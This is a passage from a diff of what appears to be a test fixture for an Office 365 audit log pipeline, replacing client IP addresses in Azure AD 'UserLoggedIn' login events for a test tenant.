Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"e2a15fc0-6892-41f5-a41c-e515231cbb0a\",\"InterSystemsId\":\"32e2f533-40fb-4783-8c66-d1bad7e1cc88\",\"IntraSystemId\":\"74ab94ce-8928-4aff-8fa2-a66ad6d41f00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:29:02\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"e2a15fc0-6892-41f5-a41c-e515231cbb0a\",\"InterSystemsId\":\"32e2f533-40fb-4783-8c66-d1bad7e1cc88\",\"IntraSystemId\":\"74ab94ce-8928-4aff-8fa2-a66ad6d41f00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -801,10 +801,10 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-09T15:29:02", "ExtendedProperties": [ { @@ -854,7 +854,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"ApplicationId\":\"4345a7b9-9a63-4910-a426-35363201d503\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:13:08\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"e11538ff-5fe1-4fdd-8c5d-219d85c47bb3\",\"InterSystemsId\":\"3c5d16f4-16a6-45f4-a53d-abb86e35005b\",\"IntraSystemId\":\"f67a1615-4606-4673-b6fb-68f716345800\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"4345a7b9-9a63-4910-a426-35363201d503\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:13:08\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"e11538ff-5fe1-4fdd-8c5d-219d85c47bb3\",\"InterSystemsId\":\"3c5d16f4-16a6-45f4-a53d-abb86e35005b\",\"IntraSystemId\":\"f67a1615-4606-4673-b6fb-68f716345800\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -872,10 +872,10 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ApplicationId": "4345a7b9-9a63-4910-a426-35363201d503", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-10T15:13:08", "ExtendedProperties": [ { @@ -925,7 +925,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"213.97.47.133\",\"ApplicationId\":\"00000002-0000-0ff1-ce00-000000000000\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"213.97.47.133\",\"CreationTime\":\"2020-02-07T16:43:27\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"e031670b-bb84-45ee-94ff-0e70a8cd1138\",\"InterSystemsId\":\"40077a75-7b58-4623-a64a-f1b7de70fa54\",\"IntraSystemId\":\"4d1bd763-9b0b-4d5a-bda9-5c7a0a0a6000\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0ff1-ce00-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0ff1-ce00-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"00000002-0000-0ff1-ce00-000000000000\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-07T16:43:27\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"e031670b-bb84-45ee-94ff-0e70a8cd1138\",\"InterSystemsId\":\"40077a75-7b58-4623-a64a-f1b7de70fa54\",\"IntraSystemId\":\"4d1bd763-9b0b-4d5a-bda9-5c7a0a0a6000\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0ff1-ce00-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0ff1-ce00-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -943,10 +943,10 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "213.97.47.133", + "ActorIpAddress": "67.43.156.15", "ApplicationId": "00000002-0000-0ff1-ce00-000000000000", "AzureActiveDirectoryEventType": 1, - "ClientIP": "213.97.47.133", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-07T16:43:27", "ExtendedProperties": [ { @@ -996,7 +996,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"37.29.234.179\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"37.29.234.179\",\"CreationTime\":\"2020-02-08T14:33:54\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"d39944c4-6766-4a89-8d5a-c789175830ee\",\"InterSystemsId\":\"425503c9-ccbf-4674-8f1e-4d56510474fd\",\"IntraSystemId\":\"57ef1056-6ce2-424a-b241-ce3939d00900\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.14\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.14\",\"CreationTime\":\"2020-02-08T14:33:54\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"d39944c4-6766-4a89-8d5a-c789175830ee\",\"InterSystemsId\":\"425503c9-ccbf-4674-8f1e-4d56510474fd\",\"IntraSystemId\":\"57ef1056-6ce2-424a-b241-ce3939d00900\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -1014,10 +1014,10 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "37.29.234.179", + "ActorIpAddress": "67.43.156.14", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "AzureActiveDirectoryEventType": 1, - "ClientIP": "37.29.234.179", + "ClientIP": "67.43.156.14", "CreationTime": "2020-02-08T14:33:54", "ExtendedProperties": [ { @@ -1067,7 +1067,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"ApplicationId\":\"4345a7b9-9a63-4910-a426-35363201d503\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:13:12\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"6f2b7716-1acc-450d-ae13-afad7e02d07e\",\"InterSystemsId\":\"4409eeeb-0ca5-42dd-99d9-4a6b2fabfa4f\",\"IntraSystemId\":\"0c8fcffc-a810-4a85-b8e2-3a2fda925c00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"4345a7b9-9a63-4910-a426-35363201d503\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:13:12\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"6f2b7716-1acc-450d-ae13-afad7e02d07e\",\"InterSystemsId\":\"4409eeeb-0ca5-42dd-99d9-4a6b2fabfa4f\",\"IntraSystemId\":\"0c8fcffc-a810-4a85-b8e2-3a2fda925c00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -1085,10 +1085,10 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ApplicationId": "4345a7b9-9a63-4910-a426-35363201d503", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-10T15:13:12", "ExtendedProperties": [ { @@ -1138,7 +1138,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"79.159.10.151\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"79.159.10.151\",\"CreationTime\":\"2020-02-12T21:38:35\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"47f3c440-3fb7-4b5e-9c20-455470b289d2\",\"InterSystemsId\":\"4542ce7e-270b-435e-8f81-ee23ea74be75\",\"IntraSystemId\":\"9718abaa-220e-49c5-8c9b-588d32b8db00\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.13\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.13\",\"CreationTime\":\"2020-02-12T21:38:35\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"47f3c440-3fb7-4b5e-9c20-455470b289d2\",\"InterSystemsId\":\"4542ce7e-270b-435e-8f81-ee23ea74be75\",\"IntraSystemId\":\"9718abaa-220e-49c5-8c9b-588d32b8db00\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -1156,10 +1156,10 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "79.159.10.151", + "ActorIpAddress": "67.43.156.13", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "AzureActiveDirectoryEventType": 1, - "ClientIP": "79.159.10.151", + "ClientIP": "67.43.156.13", "CreationTime": "2020-02-12T21:38:35", "ExtendedProperties": [ { @@ -1209,7 +1209,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"37.29.234.179\",\"ApplicationId\":\"80ccca67-54bd-44ab-8625-4b79c4dc7775\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"37.29.234.179\",\"CreationTime\":\"2020-02-08T14:38:40\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"5a3435d0-229a-41c8-bd21-b4f2b662d0f6\",\"InterSystemsId\":\"4836e306-1460-4f34-ab55-a74c9a14f50d\",\"IntraSystemId\":\"2fde8302-c39e-40b6-9c7f-1bb9d4800a00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.14\",\"ApplicationId\":\"80ccca67-54bd-44ab-8625-4b79c4dc7775\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.14\",\"CreationTime\":\"2020-02-08T14:38:40\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"5a3435d0-229a-41c8-bd21-b4f2b662d0f6\",\"InterSystemsId\":\"4836e306-1460-4f34-ab55-a74c9a14f50d\",\"IntraSystemId\":\"2fde8302-c39e-40b6-9c7f-1bb9d4800a00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { 